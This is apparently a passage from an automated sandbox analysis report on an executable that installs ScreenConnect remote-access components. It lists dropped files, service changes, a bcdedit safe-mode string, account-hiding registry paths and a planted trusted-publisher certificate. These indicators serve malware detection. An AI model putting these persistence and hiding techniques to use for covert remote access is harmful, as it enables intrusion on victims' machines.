Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: mrKs8EKXbz.exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: mrKs8EKXbz.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: mrKs8EKXbz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: mrKs8EKXbz.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8023B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399153993.0000000001512000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: mrKs8EKXbz.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80236000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2397686210.0000000002E32000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3393468743.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3392568881.0000000001060000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2393123343.0000000000B1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80232000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2401330728.000000001BF92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80232000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2401330728.000000001BF92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8023B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399153993.0000000001512000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8022A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2398171726.0000000005362000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr

PE file contains a valid data directory to section mapping

Source: mrKs8EKXbz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mrKs8EKXbz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mrKs8EKXbz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mrKs8EKXbz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mrKs8EKXbz.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe

Unpacked PE file: 9.2.ScreenConnect.WindowsClient.exe.1510000.1.unpack

Binary contains a suspicious time stamp

Source: ScreenConnect.WindowsBackstageShell.exe.2.dr

Static PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

1_2_00021000

PE file contains an invalid checksum

Source: mrKs8EKXbz.exe

Static PE information: real checksum: 0x1bda6 should be: 0x18c8a

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe	Code function: 1_2_00021BC0 push ecx; ret	1_2_00021BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3454D2A5 pushad ; iretd	2_2_00007FFD3454D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD346677B5 push eax; retf	2_2_00007FFD346677E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD3466842E push eax; ret	2_2_00007FFD3466846D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34667C7E pushad ; retf	2_2_00007FFD34667D0D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 2_2_00007FFD34687969 push ebx; retf	2_2_00007FFD3468796A
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34672D88 push eax; ret	9_2_00007FFD34672E7B
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34672FDA pushad ; retf	9_2_00007FFD34672FDB
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD346730BA push eax; iretd	9_2_00007FFD346730BB
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD34674162 push eax; ret	9_2_00007FFD34674163
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD3467AB33 push ecx; retf	9_2_00007FFD3467AB32
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD3467AAEA push ecx; retf	9_2_00007FFD3467AB32
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD349613DD push ecx; iretd	12_2_00007FFD3496141E

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\5ZQG91VN.LXQ\RRZRYXB4.KGT\ScreenConnect.WindowsFileManager.exe	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.2.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.2.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (c75cf581-c081-4bd7-96da-5933e5da1d56)

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2401330728.000000001BF92000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2397686210.0000000002E32000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3393468743.0000000002A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3392568881.0000000001060000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll0.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.2.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
